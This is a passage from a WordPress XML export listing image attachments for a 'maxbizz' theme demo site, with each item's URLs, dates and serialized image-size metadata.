		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team3.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:17:"team3-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team4</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/team4/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>527</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team4.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:17:"team4-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/pheader-value/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>531</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:25:"2020/09/pheader-value.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:24:"pheader-value-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"pheader-value-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"pheader-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"pheader-value-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"pheader-value-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/flip-box1/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>533</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/09/flip-box1.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/flip-box2/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>534</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/09/flip-box2.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box2-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/flip-box3/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>535</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/09/flip-box3.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box3-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/bg1-value/</link>
		<pubDate>Tue, 08 Sep 2020 07:17:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>540</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:17:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:17:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:408;s:4:"file";s:21:"2020/09/bg1-value.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:20:"bg1-value-300x64.jpg";s:5:"width";i:300;s:6:"height";i:64;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-value-1024x218.jpg";s:5:"width";i:1024;s:6:"height";i:218;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-value-768x163.jpg";s:5:"width";i:768;s:6:"height";i:163;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-value-1536x326.jpg";s:5:"width";i:1536;s:6:"height";i:326;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-value-600x408.jpg";s:5:"width";i:600;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/image1-value/</link>
		<pubDate>Tue, 08 Sep 2020 07:33:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>542</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:33:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:33:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:24:"2020/09/image1-value.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:24:"image1-value-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-value-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"image1-value-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"image1-value-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/bg2-value/</link>
		<pubDate>Tue, 08 Sep 2020 08:26:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>549</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:26:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:26:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:686;s:4:"file";s:21:"2020/09/bg2-value.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:21:"bg2-value-300x107.jpg";s:5:"width";i:300;s:6:"height";i:107;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-value-1024x366.jpg";s:5:"width";i:1024;s:6:"height";i:366;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-value-768x274.jpg";s:5:"width";i:768;s:6:"height";i:274;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-value-1536x549.jpg";s:5:"width";i:1536;s:6:"height";i:549;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-value-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-values</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/chart-values/</link>
		<pubDate>Tue, 08 Sep 2020 08:41:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-values.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>555</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:41:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:41:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-values]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-values.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart-values.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:24:"2020/09/chart-values.png";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:24:"chart-values-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"chart-values-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"chart-values-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"chart-values-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"chart-values-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"chart-values-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/bg3-value/</link>
